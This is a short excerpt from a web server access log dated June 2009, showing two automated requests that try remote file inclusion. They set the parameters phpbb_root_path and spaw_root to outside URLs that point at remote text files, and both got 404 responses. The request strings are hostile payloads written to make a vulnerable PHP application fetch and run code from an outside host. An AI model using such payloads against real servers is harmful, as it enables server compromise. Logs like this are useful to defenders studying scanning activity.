124.138.156.3 - - [19/Jun/2009:03:11:55 -0400] "GET /logs/access_log.Q109052200/includes/functions_admin.php?phpbb_root_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
95.154.216.25 - - [19/Jun/2009:03:11:59 -0400] "GET /logs/error_log.Q109052100/admin/editor2/spaw_control.class.php?spaw_root=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
